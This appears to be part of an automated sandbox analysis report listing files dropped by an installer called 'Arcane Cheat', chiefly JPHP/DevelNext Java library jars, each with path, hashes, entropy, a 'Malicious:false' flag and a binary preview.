                                Preview:PK..........[K................META-INF/..PK.........rNK................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK..........[K................org/..PK..........[K................org/develnext/..PK..........[K................org/develnext/jphp/..PK..........[K................org/develnext/jphp/core/..PK..........[K................org/develnext/jphp/core/common/..PK..........[K0:..).......G...org/develnext/jphp/core/common/ObjectSizeCalculator$ObjectWrapper.class.RMo.@.}k;q.\....o.$....F.@.*".p.*.'6.*qp.`;.EH........%.$...q...B.V..r.....{o.....o...* ..yh8"..:..p.'u.b....pb.rk...q.g.H.K...._f.....1h..+.f[./........OH......]Y.....af..V.G#.2.M..a..Q$..h.a..u...~l.F......0..~..v........ \..)..{c.E..~.A...K;...U>J-..<.o..VkM.,..Fi...CG.....^..I%.y,..3p.gt.e...#....d(..'.J?#..q.E..jmj....\...;...Q,...]..n.qm{[{.............T..(P.G.......3.i}..*....t.xD...'..ja.6.J@.IV.?(c..|.r.....6.~..>A-ko.Q'..(.whtlB..AS'./#..P|J..1?... ....mRWj.S.CF7X.t.......I)[/..T...ze.k.WT..,.L.

                                C:\Program Files (x86)\Arcane Cheat\lib\is-J8OSH.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):1177648
                                Entropy (8bit):7.91949701328009
                                Encrypted:false
                                SSDEEP:24576:cP4MBZrpGi4exQ9qdXVd/F/3yy7mgviLzIM:czHMi4eKCd/BzaLcM
                                MD5:D5EF47C915BEF65A63D364F5CF7CD467
                                SHA1:F711F3846E144DDDBFB31597C0C165BA8ADF8D6B
                                SHA-256:9C287472408857301594F8F7BDA108457F6FDAE6E25C87EC88DBF3012E5A98B6
                                SHA-512:04AEB956BFCD3BD23B540F9AD2D4110BB2FFD25FE899152C4B2E782DAA23A676DF9507078ECF1BFC409DDFBE2858AB4C4C324F431E45D8234E13905EB192BAE8
                                Malicious:false
                                Preview:PK..........\K................META-INF/..PK.........rNK................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK..........[K................php/..PK..........\K................php/runtime/..PK..........\K................php/runtime/annotation/..PK..........\K.~..........0...php/runtime/annotation/Reflection$Abstract.class.PMK.@...W.Xm...b...s..h..%FA<m..l7!....<...Q.[D.P....y..........8h:.u.'.>..4..H.@.WE..b}>..)p...f..e.XQW..H.g..;....O...O..E...Ts6n...b..Knp....?....n.d:!....|O.=.eB,*..#...z......@'yK..'..]~..u.Ieh..9.....J.,#.....S....._&p.vv[@....{.(q-....-F.sUB..6,|A.P.-[.a.....v...PK..........\K.RG=........+...php/runtime/annotation/Reflection$Arg.class.S[SRQ......./].L-%..X.[N..M.8........l.a....C?........p8k}.Z....?~.x...v-.-....W.`X..x...].<..o..JZ.....?...U.....6.W....=.....;P....P$.....:.-a..5.*.J8..N.z........1......m.e}...Z..Y.N...6...N.2..\4.CZS..Q..,..*......*W...i"S5.$...........Qz.r...Cf(. .fo....dZ.lH.M\.q?`.............vh

                                C:\Program Files (x86)\Arcane Cheat\lib\is-OD4SB.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):97358
                                Entropy (8bit):7.9345189846943915
                                Encrypted:false
                                SSDEEP:1536:yZwgOueuKZ4THgWvLnhgmmJFgVn+nhEA1ODIrSrUricEDMrV+LAB:yZwgwuKmTDFgmmoVn+mAUhrUicRoAB
                                MD5:4BC2AEA7281E27BC91566377D0ED1897
                                SHA1:D02D897E8A8ACA58E3635C009A16D595A5649D44
                                SHA-256:4AEF566BBF3F0B56769A0C45275EBBF7894E9DDB54430C9DB2874124B7CEA288
                                SHA-512:DA35BB2F67BCA7527DC94E5A99A162180B2701DDCA2C688D9E0BE69876ACA7C48F192D0F03D431CCD2D8EEC55E0E681322B4F15EBA4DB29EF5557316E8E51E10
                                Malicious:false
                                Preview:PK.........tVK................META-INF/..PK.........rNK................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........bkVK................org/..PK........bkVK................org/develnext/..PK........bkVK................org/develnext/jphp/..PK........bkVK................org/develnext/jphp/zend/..PK........ckVK................org/develnext/jphp/zend/ext/..PK........bkVK............!...org/develnext/jphp/zend/ext/json/..PK........bkVK.l.R........4...org/develnext/jphp/zend/ext/json/JsonConstants.class..]o.0......c]...k....!..@..u.4).[mWQ.F,S.Ti:!..K\!q...G!.M.^............;...j.2.8.O..@....dG.....A`...$......A...5..;B[.._.c.B......B`].u...[.J.D.,...f.A=.d..pv.lJ..h...t.s.cX.y...8?...b.g.[..Z.z..<...&..z....j...xiX..s...,...0J.\c..$PQ$..ym.m...x.;&.GwD....u.........".L .:.......~.@....f...tt.$.?..R6.?..I(x&f..pB...'..Ap....c...O.. .h.&q..p........O.~P.e..n..?..p....._a..E".Fi8.dh2...$...h..i..8I}.e.....C..YX....<....._F.*..|E.5.....zW..@.Tx.....+..@..

                                C:\Program Files (x86)\Arcane Cheat\lib\is-PS6NL.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):17135
                                Entropy (8bit):7.7352982443766
                                Encrypted:false
                                SSDEEP:384:fSw3uFslDvQGOoqdoUFKgvXj9jmHo5+FejOcEDffWPvy:KwJlrQGOdoUFKgvTmn6y
                                MD5:FDE38932B12FC063451AF6613D4470CC
                                SHA1:BC08C114681A3AFC05FB8C0470776C3EAE2EEFEB
                                SHA-256:9967EA3C3D1AEE8DB5A723F714FBA38D2FC26D8553435AB0E1D4E123CD211830
                                SHA-512:0F211F81101CED5FFF466F2AAB0E6C807BB18B23BC4928FE664C60653C99FA81B34EDF5835FCC3AFFB34B0DF1FA61C73A621DF41355E4D82131F94FCC0B0E839
                                Malicious:false
                                Preview:PK........K.\K................META-INF/..PK.........rNK................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK..........[K................org/..PK..........[K................org/develnext/..PK..........[K................org/develnext/jphp/..PK........K.\K................org/develnext/jphp/json/..PK........K.\K............ ...org/develnext/jphp/json/classes/..PK........K.\K........5...5...org/develnext/jphp/json/classes/JsonProcessor$1.class..[S.@.....B..E.^.A..\B.C..Uf..":.8!Y.t..$...|.M?./:.....x...C.H3._.....nv......,6...(C"..$.R.c.......*..C.a.a.a.a.a.a.a.a.a.!.eXaXU.5m.?..H.1....i...r..v`.%.wt...Y...#^.t...6.9Ks]N.t..E......O-.......%..M^.G...tFA[.,....../k..{.....U..e.....d..kq.o{f....jf.......o.A..M..P.Om.r\..ns....k1..]._...c.+.;...u.,)R...u...6.!-.Q...h_.C....(,..O..!.M.r...;.... ....io.)^....5*".F!6L[..Fe.J....C..yuO....H............#.uE..}..;.W.\,..5rn=.|&......#<...C..Z..Ok...T..r".L\).]1.a(.J.9..[.$.1E.Y/j?.^:..{4.@S`....%.o...

                                C:\Program Files (x86)\Arcane Cheat\lib\is-S4SM4.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):20151
                                Entropy (8bit):7.765220504812666
                                Encrypted:false
                                SSDEEP:384:dti5BMxSo4LgAAsJilYcmwPbEM0Av7wGkJXbhS1OaVKD6U2:DqoCgqyIMZwRJLQO5eU2
                                MD5:0A79304556A1289AA9E6213F574F3B08
                                SHA1:7EE3BDE3B1777BF65D4F62CE33295556223A26CD
                                SHA-256:434E57FFFC7DF0B725C1D95CABAFDCDB83858CCB3E5E728A74D3CF33A0CA9C79
                                SHA-512:1560703D0C162D73C99CEF9E8DDC050362E45209CC8DEA6A34A49E2B6F99AAE462EAE27BA026BDB29433952B6696896BB96998A0F6AC0A3C1DBBB2F6EBC26A7E
                                Malicious:false
                                Preview:PK.........tVK................META-INF/..PK.........rNK................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........wkVK................org/..PK........wkVK................org/develnext/..PK........wkVK................org/develnext/jphp/..PK........wkVK................org/develnext/jphp/ext/..PK........wkVK................org/develnext/jphp/ext/xml/..PK........wkVK............#...org/develnext/jphp/ext/xml/classes/..PK........wkVKmw.>........@...org/develnext/jphp/ext/xml/classes/WrapDomDocument$Methods.class.R]S.@.=......R...!y!3.}..L...;".5.iS...f..O.....r.l...f$.9{..~.....'.W.q...9...}.NS.U/a...y......e.D".,.%h.pk....|.`BOh.P>..J.|.N...>...C..H...4./....E\.t....M.g..<...|..yC..`...1..k;.l.Vu.u..+.P...ro....N~...g..>..#..X.%...U.........n.fB.C..yw.KQ..;.g}..4..UmW.*E.d...T..P.|....Li..g..2..........8.5.%..Ez..[dw.M.H....pv..I6..p.&A..<gypE......r...i..9.{.@?...?|..Pw.........U.s..h...A....,..cp.K........W,...m..cp...........c<.....cK..;$x.....PK........w

                                C:\Program Files (x86)\Arcane Cheat\lib\is-SI355.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):13202
                                Entropy (8bit):7.737712617961208
                                Encrypted:false
                                SSDEEP:192:LhR1Ygxt7I20RiT2dI03cIH8W6Bc4/kyOLZAy0ZH6AfkA8sFayhbD3D3KRe:1RNRI24AKBcW6BIyYreXf/iyhPD3KU
                                MD5:3E5E8CCCFF7FF343CBFE22588E569256
                                SHA1:66756DAA182672BFF27E453EED585325D8CC2A7A
                                SHA-256:0F26584763EF1C5EC07D1F310F0B6504BC17732F04E37F4EB101338803BE0DC4
                                SHA-512:8EA5F31E25C3C48EE21C51ABE9146EE2A270D603788EC47176C16ACAC15DAD608EEF4FA8CA0F34A1BBC6475C29E348BD62B0328E73D2E1071AAA745818867522
                                Malicious:false
                                Preview:PK........3.\K................META-INF/..PK........3.\K................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........3.\K................JPHP-INF/..PK........3.\K................JPHP-INF/sdk/..PK........3.\K..e.....\... ...JPHP-INF/sdk/ArithmeticError.phpe..j.0...@.Ac...n]..C..+8....)Xr....t.`cI.......i.K..t.V..F..)@...l.[B...G^b.E=I.a.2J..'..%.b. ^.......z........S ........v......d.h4...1NN]..,..t...~..yo&...G.....<@A...5. .\..ET.w;.S...w.....a..61...[.O....k....PK........3.\K.J.......... ...JPHP-INF/sdk/array-functions.php.Y]o.0.}G.?..M....M[.U.j.h.=F&..q2.0.u.}Nb ....:.@7p....p...Y...\]^v;.e.)C.....z.z.G...z1.P....h...U..H...jc.O..@4..U.._..K..C....6...q;..v.t;.})q....Q..eE..5wg+.l.c..V.......T{qJ..(53.cXn..<..#.k.....RI.A..8...D$..0..0]os...|...OR...p......]..`0.f.8.q....p...H....E..4>{...5.Xf.....5...Wms...>....LH..$,`C......T..#.#K..4".....f.-!h..MAle.m.a..2.....AZ......iT.Z.....Vu.J.a......p..4.6B..I..D9GY....}.L"Mh.....$...M.

                                C:\Program Files (x86)\Arcane Cheat\lib\is-UJDM9.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):106006
                                Entropy (8bit):7.823795646704166
                                Encrypted:false
                                SSDEEP:1536:CPj4aLCBcnn4xGrpR7H30x4VTNVNM43QHt0msLiWzO5SQJn4494m75CYl3U:ETCBmnoCptBNNVNzQ6e5SQW494mlZ2
                                MD5:0C8768CDEB3E894798F80465E0219C05
                                SHA1:C4DA07AC93E4E547748ECC26B633D3DB5B81CE47
                                SHA-256:15F36830124FC7389E312CF228B952024A8CE8601BF5C4DF806BC395D47DB669
                                SHA-512:35DB507A3918093B529547E991AB6C1643A96258FC95BA1EA7665FF762B0B8ABB1EF732B3854663A947EFFE505BE667BD2609FFCCCB6409A66DF605F971DA106
                                Malicious:false
                                Preview:PK........3.\K................META-INF/..PK........3.\K................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........3.\K.................packages/..PK........3.\KpS..v............packages/framework.pkg.W.n.8.}....}..,.:m....c3.&.(Hr;....k..V..h.sH../.\..h... w.T6j....k.o..;L.....dBR.{/.I.P.t.H.:s...X.......#...-..CPm.....lT;..u........P..o.L.j..a.h...@.@..6`J....D9..IfT..U....d.B.]..........T.<.......nfs..k....P`..,..g........T[+@.em.cY...F.k.h..T.M.1....{.eg@+Q.._a.....(O.Z..y.UPu....;.M.......8O..d$....)...MlMc/..;.|....N.(.s.......1.c.n..... T+..._.g*@R9.. ...F...../...lg..>.....W...J.6.<.VT..iY.l....}......M.J.?.........YS....H.9rG.I.;....ZK...d'|....Ix....c.....ve._s......JOu..s....Z...)g........j.K.W.7.o .^....:!m...n...........*9Q'..8.<..3!.\.8.j...z.mn.....6.....].N/...x]..Ke....:.A.Z.......l..AaG3~..y.K8R..<#J?..P..._..k.H........ .]L8.......j......lYq..).......(.hCf...$$..l.....K...M3...Ll9....-.1.%.......v.....m...

                                C:\Program Files (x86)\Arcane Cheat\lib\jphp-app-framework.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):106006
                                Entropy (8bit):7.823795646704166
                                Encrypted:false
                                SSDEEP:1536:CPj4aLCBcnn4xGrpR7H30x4VTNVNM43QHt0msLiWzO5SQJn4494m75CYl3U:ETCBmnoCptBNNVNzQ6e5SQW494mlZ2
                                MD5:0C8768CDEB3E894798F80465E0219C05
                                SHA1:C4DA07AC93E4E547748ECC26B633D3DB5B81CE47
                                SHA-256:15F36830124FC7389E312CF228B952024A8CE8601BF5C4DF806BC395D47DB669
                                SHA-512:35DB507A3918093B529547E991AB6C1643A96258FC95BA1EA7665FF762B0B8ABB1EF732B3854663A947EFFE505BE667BD2609FFCCCB6409A66DF605F971DA106
                                Malicious:false
                                Preview:PK........3.\K................META-INF/..PK........3.\K................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........3.\K.................packages/..PK........3.\KpS..v............packages/framework.pkg.W.n.8.}....}..,.:m....c3.&.(Hr;....k..V..h.sH../.\..h... w.T6j....k.o..;L.....dBR.{/.I.P.t.H.:s...X.......#...-..CPm.....lT;..u........P..o.L.j..a.h...@.@..6`J....D9..IfT..U....d.B.]..........T.<.......nfs..k....P`..,..g........T[+@.em.cY...F.k.h..T.M.1....{.eg@+Q.._a.....(O.Z..y.UPu....;.M.......8O..d$....)...MlMc/..;.|....N.(.s.......1.c.n..... T+..._.g*@R9.. ...F...../...lg..>.....W...J.6.<.VT..iY.l....}......M.J.?.........YS....H.9rG.I.;....ZK...d'|....Ix....c.....ve._s......JOu..s....Z...)g........j.K.W.7.o .^....:!m...n...........*9Q'..8.<..3!.\.8.j...z.mn.....6.....].N/...x]..Ke....:.A.Z.......l..AaG3~..y.K8R..<#J?..P..._..k.H........ .]L8.......j......lYq..).......(.hCf...$$..l.....K...M3...Ll9....-.1.%.......v.....m...

                                C:\Program Files (x86)\Arcane Cheat\lib\jphp-core.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):475905
                                Entropy (8bit):7.8713354167151675
                                Encrypted:false
                                SSDEEP:12288:pyfuv+DnikW2IfqFXKzNGNyyRmfD4vCgdiRST:pLWDnid2IfZGAyAfczdig
                                MD5:7E5E3D6D352025BD7F093C2D7F9B21AB
                                SHA1:AD9BFC2C3D70C574D34A752C5D0EBCC43A046C57
                                SHA-256:5B37E8FF2850A4CBB02F9F02391E9F07285B4E0667F7E4B2D4515B78E699735A
                                SHA-512:C19C29F8AD8B6BEB3EED40AB7DC343468A4CA75D49F1D0D4EA0B4A5CEE33F745893FBA764D35C8BD157F7842268E0716B1EB4B8B26DCF888FB3B3F4314844AAD
                                Malicious:false
                                Preview:PK..........[K................META-INF/..PK.........rNK................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK..........[K................org/..PK..........[K................org/develnext/..PK..........[K................org/develnext/jphp/..PK..........[K................org/develnext/jphp/core/..PK..........[K................org/develnext/jphp/core/common/..PK..........[K0:..).......G...org/develnext/jphp/core/common/ObjectSizeCalculator$ObjectWrapper.class.RMo.@.}k;q.\....o.$....F.@.*".p.*.'6.*qp.`;.EH........%.$...q...B.V..r.....{o.....o...* ..yh8"..:..p.'u.b....pb.rk...q.g.H.K...._f.....1h..+.f[./........OH......]Y.....af..V.G#.2.M..a..Q$..h.a..u...~l.F......0..~..v........ \..)..{c.E..~.A...K;...U>J-..<.o..VkM.,..Fi...CG.....^..I%.y,..3p.gt.e...#....d(..'.J?#..q.E..jmj....\...;...Q,...]..n.qm{[{.............T..(P.G.......3.i}..*....t.xD...'..ja.6.J@.IV.?(c..|.r.....6.~..>A-ko.Q'..(.whtlB..AS'./#..P|J..1?... ....mRWj.S.CF7X.t.......I)[/..T...ze.k.WT..,.L.

                                C:\Program Files (x86)\Arcane Cheat\lib\jphp-desktop-ext.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):17374
                                Entropy (8bit):7.682654493549437
                                Encrypted:false
                                SSDEEP:384:Paj1PXNyyQwsCxm7VXh3il27I8pdo63XNrqlY3ylWn4iczt3Z:e1/BQwsCxIVXhuF8pKaXNdXn4icz9Z
                                MD5:B50E2C75F5F0E1094E997DE8A2A2D0CA
                                SHA1:D789EB689C091536EA6A01764BADA387841264CB
                                SHA-256:CF4068EBB5ECD47ADEC92AFBA943AEA4EB2FEE40871330D064B69770CCCB9E23
                                SHA-512:57D8AC613805EDADA6AEBA7B55417FD7D41C93913C56C4C2C1A8E8A28BBB7A05AADE6E02B70A798A078DC3C747967DA242C6922B342209874F3CAF7312670CB0
                                Malicious:false
                                Preview:PK........3.\K................META-INF/..PK........3.\K................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........3.\K................org/..PK........3.\K................org/develnext/..PK........3.\K................org/develnext/jphp/..PK........3.\K................org/develnext/jphp/ext/..PK........3.\K................org/develnext/jphp/ext/gui/..PK........3.\K............#...org/develnext/jphp/ext/gui/desktop/..PK........3.\K............+...org/develnext/jphp/ext/gui/desktop/classes/..PK........3.\K.|wk.......6...org/develnext/jphp/ext/gui/desktop/classes/Mouse.class.SmO.A.~...^O....J..P..QQ.."&M*.0|2!.c)...n..../&F.....(..-.A..}f.yff......2..0e.&.m.B!....ha..<C.#..~..P....0VZ.+T.]W....&.^.r.b.....r.|.E....m..Z.+...R...V..k^.......<.....z_F.K. ....!|%..{`.Q.%..[..].(..}..XeHQ........h...S.i.!....*.a.i.(..F6..m.I...R...Yp.2[....C..))%.f...]..Mt7..Sm6...D.D......'.K3);i{.7..ER..5..'N'..73ip?&^.hoZ.up.....,.e.wq..}.W..`.+..g.%....|...S.....*......&t.

                                C:\Program Files (x86)\Arcane Cheat\lib\jphp-gui-ext.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):704689
                                Entropy (8bit):7.834558665203789
                                Encrypted:false
                                SSDEEP:12288:sSn9gd/GXLtKb+Ozu5idmEfcHOPJZ7bw1kXn0yZLJZsDDpJSWB5qSEhQ:sMw/GXUb+euCVIOxRQIZOnuK
                                MD5:6696368A09C7F8FED4EA92C4E5238CEE
                                SHA1:F89C282E557D1207AFD7158B82721C3D425736A7
                                SHA-256:C25D7A7B8F0715729BCCB817E345F0FDD668DD4799C8DAB1A4DB3D6A37E7E3E4
                                SHA-512:0AB24F07F956E3CDCD9D09C3AA4677FF60B70D7A48E7179A02E4FF9C0D2C7A1FC51624C3C8A5D892644E9F36F84F7AAF4AA6D2C9E1C291C88B3CFF7568D54F76
                                Malicious:false
                                Preview:PK........gt]K................META-INF/..PK........0.\K................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK......../.\K................org/..PK......../.\K................org/develnext/..PK......../.\K................org/develnext/jphp/..PK......../.\K................org/develnext/jphp/ext/..PK........gt]K................org/develnext/jphp/ext/javafx/..PK........gt]K............#...org/develnext/jphp/ext/javafx/bind/..PK........gt]K....V.......>...org/develnext/jphp/ext/javafx/bind/BoundsMemoryOperation.class.V[W.U..N..a....B[.Z...h-.....E.h.-.j..$.Hf..$....|...P}.k.e.k..\.33..&..b......g_f.....K.w..a.3.f..).W.0.va._(.R.....).5.......$.Z.#).*V.\U.&..)S*6.|....V..$.S..0.cKAZA..s.-1.......3N.3.IX6_.....bn.h%.p.fa.t-....[e........k....K...U3[3.,;c<p*v......\.),.`8..g.f...|,.8!.......:.w%..m..K./.0..."+%..U...l,!..Vla....1gW-.....ol..f./.Y.....x".(."..^.....i.k'zc.........e.9.@..0hs.4/.\...UW..?.m.X..%..O.s...N..S..{....0.;.f).owu.....yZ...[.h....

                                C:\Program Files (x86)\Arcane Cheat\lib\jphp-json-ext.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):17135
                                Entropy (8bit):7.7352982443766
                                Encrypted:false
                                SSDEEP:384:fSw3uFslDvQGOoqdoUFKgvXj9jmHo5+FejOcEDffWPvy:KwJlrQGOdoUFKgvTmn6y
                                MD5:FDE38932B12FC063451AF6613D4470CC
                                SHA1:BC08C114681A3AFC05FB8C0470776C3EAE2EEFEB
                                SHA-256:9967EA3C3D1AEE8DB5A723F714FBA38D2FC26D8553435AB0E1D4E123CD211830
                                SHA-512:0F211F81101CED5FFF466F2AAB0E6C807BB18B23BC4928FE664C60653C99FA81B34EDF5835FCC3AFFB34B0DF1FA61C73A621DF41355E4D82131F94FCC0B0E839
                                Malicious:false
                                Preview:PK........K.\K................META-INF/..PK.........rNK................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK..........[K................org/..PK..........[K................org/develnext/..PK..........[K................org/develnext/jphp/..PK........K.\K................org/develnext/jphp/json/..PK........K.\K............ ...org/develnext/jphp/json/classes/..PK........K.\K........5...5...org/develnext/jphp/json/classes/JsonProcessor$1.class..[S.@.....B..E.^.A..\B.C..Uf..":.8!Y.t..$...|.M?./:.....x...C.H3._.....nv......,6...(C"..$.R.c.......*..C.a.a.a.a.a.a.a.a.a.!.eXaXU.5m.?..H.1....i...r..v`.%.wt...Y...#^.t...6.9Ks]N.t..E......O-.......%..M^.G...tFA[.,....../k..{.....U..e.....d..kq.o{f....jf.......o.A..M..P.Om.r\..ns....k1..]._...c.+.;...u.,)R...u...6.!-.Q...h_.C....(,..O..!.M.r...;.... ....io.)^....5*".F!6L[..Fe.J....C..yuO....H............#.uE..}..;.W.\,..5rn=.|&......#<...C..Z..Ok...T..r".L\).]1.a(.J.9..[.$.1E.Y/j?.^:..{4.@S`....%.o...

                                C:\Program Files (x86)\Arcane Cheat\lib\jphp-runtime.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):1177648
                                Entropy (8bit):7.91949701328009
                                Encrypted:false
                                SSDEEP:24576:cP4MBZrpGi4exQ9qdXVd/F/3yy7mgviLzIM:czHMi4eKCd/BzaLcM
                                MD5:D5EF47C915BEF65A63D364F5CF7CD467
                                SHA1:F711F3846E144DDDBFB31597C0C165BA8ADF8D6B
                                SHA-256:9C287472408857301594F8F7BDA108457F6FDAE6E25C87EC88DBF3012E5A98B6
                                SHA-512:04AEB956BFCD3BD23B540F9AD2D4110BB2FFD25FE899152C4B2E782DAA23A676DF9507078ECF1BFC409DDFBE2858AB4C4C324F431E45D8234E13905EB192BAE8
                                Malicious:false
                                Preview:PK..........\K................META-INF/..PK.........rNK................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK..........[K................php/..PK..........\K................php/runtime/..PK..........\K................php/runtime/annotation/..PK..........\K.~..........0...php/runtime/annotation/Reflection$Abstract.class.PMK.@...W.Xm...b...s..h..%FA<m..l7!....<...Q.[D.P....y..........8h:.u.'.>..4..H.@.WE..b}>..)p...f..e.XQW..H.g..;....O...O..E...Ts6n...b..Knp....?....n.d:!....|O.=.eB,*..#...z......@'yK..'..]~..u.Ieh..9.....J.,#.....S....._&p.vv[@....{.(q-....-F.sUB..6,|A.P.-[.a.....v...PK..........\K.RG=........+...php/runtime/annotation/Reflection$Arg.class.S[SRQ......./].L-%..X.[N..M.8........l.a....C?........p8k}.Z....?~.x...v-.-....W.`X..x...].<..o..JZ.....?...U.....6.W....=.....;P....P$.....:.-a..5.*.J8..N.z........1......m.e}...Z..Y.N...6...N.2..\4.CZS..Q..,..*......*W...i"S5.$...........Qz.r...Cf(. .fo....dZ.lH.M\.q?`.............vh

                                C:\Program Files (x86)\Arcane Cheat\lib\jphp-xml-ext.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):20151
                                Entropy (8bit):7.765220504812666
                                Encrypted:false
                                SSDEEP:384:dti5BMxSo4LgAAsJilYcmwPbEM0Av7wGkJXbhS1OaVKD6U2:DqoCgqyIMZwRJLQO5eU2
                                MD5:0A79304556A1289AA9E6213F574F3B08
                                SHA1:7EE3BDE3B1777BF65D4F62CE33295556223A26CD
                                SHA-256:434E57FFFC7DF0B725C1D95CABAFDCDB83858CCB3E5E728A74D3CF33A0CA9C79
                                SHA-512:1560703D0C162D73C99CEF9E8DDC050362E45209CC8DEA6A34A49E2B6F99AAE462EAE27BA026BDB29433952B6696896BB96998A0F6AC0A3C1DBBB2F6EBC26A7E
                                Malicious:false
                                Preview:PK.........tVK................META-INF/..PK.........rNK................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........wkVK................org/..PK........wkVK................org/develnext/..PK........wkVK................org/develnext/jphp/..PK........wkVK................org/develnext/jphp/ext/..PK........wkVK................org/develnext/jphp/ext/xml/..PK........wkVK............#...org/develnext/jphp/ext/xml/classes/..PK........wkVKmw.>........@...org/develnext/jphp/ext/xml/classes/WrapDomDocument$Methods.class.R]S.@.=......R...!y!3.}..L...;".5.iS...f..O.....r.l...f$.9{..~.....'.W.q...9...}.NS.U/a...y......e.D".,.%h.pk....|.`BOh.P>..J.|.N...>...C..H...4./....E\.t....M.g..<...|..yC..`...1..k;.l.Vu.u..+.P...ro....N~...g..>..#..X.%...U.........n.fB.C..yw.KQ..;.g}..4..UmW.*E.d...T..P.|....Li..g..2..........8.5.%..Ez..[dw.M.H....pv..I6..p.&A..<gypE......r...i..9.{.@?...?|..Pw.........U.s..h...A....,..cp.K........W,...m..cp...........c<.....cK..;$x.....PK........w

                                C:\Program Files (x86)\Arcane Cheat\lib\jphp-zend-ext.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):97358
                                Entropy (8bit):7.9345189846943915
                                Encrypted:false
                                SSDEEP:1536:yZwgOueuKZ4THgWvLnhgmmJFgVn+nhEA1ODIrSrUricEDMrV+LAB:yZwgwuKmTDFgmmoVn+mAUhrUicRoAB
                                MD5:4BC2AEA7281E27BC91566377D0ED1897
                                SHA1:D02D897E8A8ACA58E3635C009A16D595A5649D44
                                SHA-256:4AEF566BBF3F0B56769A0C45275EBBF7894E9DDB54430C9DB2874124B7CEA288
                                SHA-512:DA35BB2F67BCA7527DC94E5A99A162180B2701DDCA2C688D9E0BE69876ACA7C48F192D0F03D431CCD2D8EEC55E0E681322B4F15EBA4DB29EF5557316E8E51E10
                                Malicious:false
                                Preview:PK.........tVK................META-INF/..PK.........rNK................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK........bkVK................org/..PK........bkVK................org/develnext/..PK........bkVK................org/develnext/jphp/..PK........bkVK................org/develnext/jphp/zend/..PK........ckVK................org/develnext/jphp/zend/ext/..PK........bkVK............!...org/develnext/jphp/zend/ext/json/..PK........bkVK.l.R........4...org/develnext/jphp/zend/ext/json/JsonConstants.class..]o.0......c]...k....!..@..u.4).[mWQ.F,S.Ti:!..K\!q...G!.M.^............;...j.2.8.O..@....dG.....A`...$......A...5..;B[.._.c.B......B`].u...[.J.D.,...f.A=.d..pv.lJ..h...t.s.cX.y...8?...b.g.[..Z.z..<...&..z....j...xiX..s...,...0J.\c..$PQ$..ym.m...x.;&.GwD....u.........".L .:.......~.@....f...tt.$.?..R6.?..I(x&f..pB...'..Ap....c...O.. .h.&q..p........O.~P.e..n..?..p....._a..E".Fi8.dh2...$...h..i..8I}.e.....C..YX....<....._F.*..|E.5.....zW..@.Tx.....+..@..

                                C:\Program Files (x86)\Arcane Cheat\unins000.dat

                                Download File
